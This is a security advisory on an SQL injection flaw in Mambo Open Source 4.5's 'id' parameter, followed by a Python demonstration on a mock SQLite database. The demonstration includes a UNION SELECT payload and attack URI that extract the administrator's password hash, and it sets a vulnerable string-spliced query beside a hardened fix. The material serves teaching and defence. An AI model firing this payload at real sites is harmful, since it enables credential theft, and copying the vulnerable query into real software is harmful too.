It has been reported that the Mambo 'index.php' script is prone to an SQL injection vulnerability. The issue is due to a failure of the application to properly validate user-supplied URI input before using it in a database query.
As a result, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue.
Mambo Open Source index.php id Parameter SQL Injection
Remote / Network Access
Loss of Confidentiality, Loss of Integrity
Mambo Open Source 4.5 contains a flaw that allows an attacker to inject arbitrary SQL code. The problem is that the "id" variable handled by the "pathway.php" module (called via index.php) is taken from the request URI and is not validated properly, so an attacker can inject or manipulate the SQL queries it is used in.
Upgrade to version 1.0.4 or higher, which has been reported to fix this vulnerability. An upgrade is required, as there are no known workarounds.
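As an added illustration of the flaw class described above, the following Python example (written for this page; it is not Mambo's pathway.php or any other Mambo code) uses an in-memory SQLite database to show what happens when the "id" parameter taken from the request URI is spliced into a query unvalidated, and how a UNION payload in that parameter pulls the administrator's password hash out of the users table. The table layout, column names, sample rows, the administrator account and the request URI shape are constructed assumptions that only loosely mirror Mambo's mos_content and mos_users tables. A hardened lookup that casts the parameter to an integer and binds it as a query parameter is shown beside the vulnerable one.

```python
import hashlib
import sqlite3
import urllib.parse

# Constructed sample data: a plain MD5 of an example password, which is how
# Mambo 4.5 stored passwords; the account itself is made up for this example.
SAMPLE_ADMIN_HASH = hashlib.md5(b"example-password").hexdigest()


def make_db():
    """Build an in-memory stand-in for the Mambo database.

    Assumption: table and column names loosely follow Mambo's mos_content and
    mos_users tables; only the columns this example needs are present.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE mos_content (id INTEGER PRIMARY KEY, title TEXT, catid INTEGER);
        CREATE TABLE mos_users (id INTEGER PRIMARY KEY, username TEXT,
                                password TEXT, usertype TEXT);
        INSERT INTO mos_content VALUES (1, 'Welcome to Mambo', 3);
        INSERT INTO mos_content VALUES (2, 'Second article', 3);
        INSERT INTO mos_users VALUES (62, 'admin', '{SAMPLE_ADMIN_HASH}', 'Super Administrator');
    """)
    return conn


def id_from_uri(uri):
    """Return the raw 'id' query parameter as the application would receive it."""
    query = urllib.parse.urlsplit(uri).query
    return urllib.parse.parse_qs(query).get("id", [None])[0]


def lookup_content_vulnerable(conn, id_param):
    """Unvalidated lookup: the parameter is spliced straight into the SQL text.

    This mirrors the flaw class in the advisory (an "id" value that is never
    checked before use); it is not Mambo's own code.
    """
    query = f"SELECT title, catid FROM mos_content WHERE id = {id_param}"
    return conn.execute(query).fetchall()


def lookup_content_safe(conn, id_param):
    """Hardened lookup: reject anything that is not an integer, then bind it."""
    try:
        content_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError(f"invalid id parameter: {id_param!r}")
    return conn.execute(
        "SELECT title, catid FROM mos_content WHERE id = ?", (content_id,)
    ).fetchall()


def is_rejected(conn, id_param):
    """True when the hardened lookup refuses the value instead of querying."""
    try:
        lookup_content_safe(conn, id_param)
    except ValueError:
        return True
    return False


# A UNION payload with the same column count as the legitimate query; the first
# SELECT matches no row (id = 0), so the only row returned is the admin's.
PAYLOAD = ("0 UNION SELECT username, password FROM mos_users "
           "WHERE usertype = 'Super Administrator'")


def build_attack_uri(payload):
    """Assumed request shape for illustration; the real URI layout may differ."""
    return "/index.php?option=com_content&task=view&id=" + urllib.parse.quote(payload)


if __name__ == "__main__":
    db = make_db()
    injected_id = id_from_uri(build_attack_uri(PAYLOAD))
    print("normal request:  ", lookup_content_vulnerable(db, "1"))
    print("injected request:", lookup_content_vulnerable(db, injected_id))
    print("hardened lookup rejected the payload:", is_rejected(db, injected_id))
```

The integer cast is the minimal fix for a numeric identifier: the hardened lookup never lets the payload reach the database, and binding the value as a parameter keeps the query text fixed even if the check is later loosened.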